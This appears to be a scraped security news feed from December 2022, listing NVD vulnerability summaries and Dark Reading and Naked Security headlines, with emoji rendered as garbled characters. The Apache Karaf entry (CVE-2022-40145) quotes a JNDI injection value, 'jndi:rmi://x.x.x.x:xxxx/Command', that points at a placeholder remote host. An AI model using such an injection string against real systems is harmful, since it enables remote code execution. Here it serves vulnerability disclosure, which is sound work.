βΌ CVE-2022-46330 βΌ
π Read
via "National Vulnerability Database".
Squirrel.Windows is both a toolset and a library that provides installation and update functionality for Windows desktop applications. Installers generated by Squirrel.Windows 2.0.1 and earlier contain an issue with the DLL search path, which may lead to insecurely loading Dynamic Link Libraries. As a result, arbitrary code may be executed with the privilege of the user invoking the installer.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38060 βΌ
π Read
via "National Vulnerability Database".
A privilege escalation vulnerability exists in the sudo functionality of OpenStack Kolla git master 05194e7618. A misconfiguration in /etc/sudoers within a container can lead to increased privileges.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38065 βΌ
π Read
via "National Vulnerability Database".
A privilege escalation vulnerability exists in the oslo.privsep functionality of OpenStack git master 05194e7618 and prior. Overly permissive functionality within tools leveraging this library within a container can lead increased privileges.π Read
via "National Vulnerability Database".
π΄ How to Run Kubernetes More Securely π΄
π Read
via "Dark Reading".
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.π Read
via "Dark Reading".
Dark Reading
How to Run Kubernetes More Securely
The open source container tool is quite popular among developers β and threat actors. Here are a few ways DevOps teams can take control.
π΄ Godfather Banking Trojan Masquerades as Legitimate Google Play App π΄
π Read
via "Dark Reading".
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.π Read
via "Dark Reading".
Dark Reading
Godfather Banking Trojan Masquerades as Legitimate Google Play App
The malware has resurfaced, using an icon and name similar to the legitimate Google Play app MYT Music, a popular app with more than 10 million downloads.
π΄ Understanding the 3 Classes of Kubernetes Risk π΄
π Read
via "Dark Reading".
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.π Read
via "Dark Reading".
Dark Reading
Understanding the 3 Classes of Kubernetes Risk
The first step toward securing Kubernetes environments is understanding the risks they pose and identifying the ways in which those risks can be mitigated.
π1
π΄ Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists π΄
π Read
via "Dark Reading".
π Read
via "Dark Reading".
Dark Reading
Kaspersky Research Finds Reverse Engineering Is the Most On-Demand Skill Among InfoSec Specialists
Woburn, MA β December 21, 2022 β According toresults shown by the latest statistics from participantspassing Kaspersky Expert Training courses, the most desired skill IT security professionals wanted to advance in 2022 is the ability to reverse engineer malware.
βΌ CVE-2022-40145 βΌ
π Read
via "National Vulnerability Database".
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8π Read
via "National Vulnerability Database".
π1
β Microsoft dishes the dirt on Appleβs βAchilles heelβ shortly after fixing similar Windows bug β
π Read
via "Naked Security".
It happens to the best of us: Microsoft highlights a security bypass bug on Macs that is curiously similar to a recent Windows 0-day.π Read
via "Naked Security".
Sophos News
Naked Security β Sophos News
π΄ Trend Micro Joins Googleβs App Defense Alliance π΄
π Read
via "Dark Reading".
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.π Read
via "Dark Reading".
Dark Reading
Trend Micro Joins Googleβs App Defense Alliance
Trend Micro will be joining Google's App Defense Alliance (ADA) to help improve their ability to identify malicious apps before they are published to the Google Play store.
β βSuspicious loginβ scammers up their game β take care at Christmas β
π Read
via "Naked Security".
A picture is worth 1024 words - we clicked through so you don't have to.π Read
via "Naked Security".
Naked Security
βSuspicious loginβ scammers up their game β take care at Christmas
A picture is worth 1024 words β we clicked through so you donβt have to.
π΄ Name That Toon: Kiss and Tell π΄
π Read
via "Dark Reading".
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.π Read
via "Dark Reading".
Dark Reading
Name That Toon: Kiss and Tell
Feeling creative? Submit your caption and our panel of experts will reward the winner with a $25 Amazon gift card.
βΌ CVE-2022-40841 βΌ
π Read
via "National Vulnerability Database".
A cross-site scripting (XSS) vulnerability in NdkAdvancedCustomizationFields v3.5.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payloads injected into the "htmlNodes" parameter.π Read
via "National Vulnerability Database".
βΌ CVE-2022-42454 βΌ
π Read
via "National Vulnerability Database".
Insights for Vulnerability Remediation (IVR) is vulnerable to man-in-the-middle attacks that may lead to information disclosure. This requires privileged network access.π Read
via "National Vulnerability Database".
βΌ CVE-2022-4287 βΌ
π Read
via "National Vulnerability Database".
Authentication bypass in local application lock feature in Devolutions Remote Desktop Manager 2022.3.26 and earlier on Windows allows malicious user to access the application.π Read
via "National Vulnerability Database".
βΌ CVE-2022-44756 βΌ
π Read
via "National Vulnerability Database".
Insights for Vulnerability Remediation (IVR) is vulnerable to improper input validation. This may lead to information disclosure. This requires privileged access.π Read
via "National Vulnerability Database".
βΌ CVE-2022-47581 βΌ
π Read
via "National Vulnerability Database".
Isode M-Vault 16.0v0 through 17.x before 17.0v24 can crash upon an LDAP v1 bind request.π Read
via "National Vulnerability Database".
βΌ CVE-2022-4630 βΌ
π Read
via "National Vulnerability Database".
Sensitive Cookie Without 'HttpOnly' Flag in GitHub repository lirantal/daloradius prior to master.π Read
via "National Vulnerability Database".
βΌ CVE-2022-38655 βΌ
π Read
via "National Vulnerability Database".
BigFix WebUI non-master operators are missing controls that prevent them from being able to modify the relevance of fixlets or to deploy fixlets from the BES Support external site.π Read
via "National Vulnerability Database".
π΄ Best Practices for Securing and Governing Your Multicloud Deployment π΄
π Read
via "Dark Reading".
Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.π Read
via "Dark Reading".
Dark Reading
Best Practices for Securing and Governing Your Multicloud Deployment
Organizations can start by integrating functions like detection, prioritization, and remediation on to a single platform.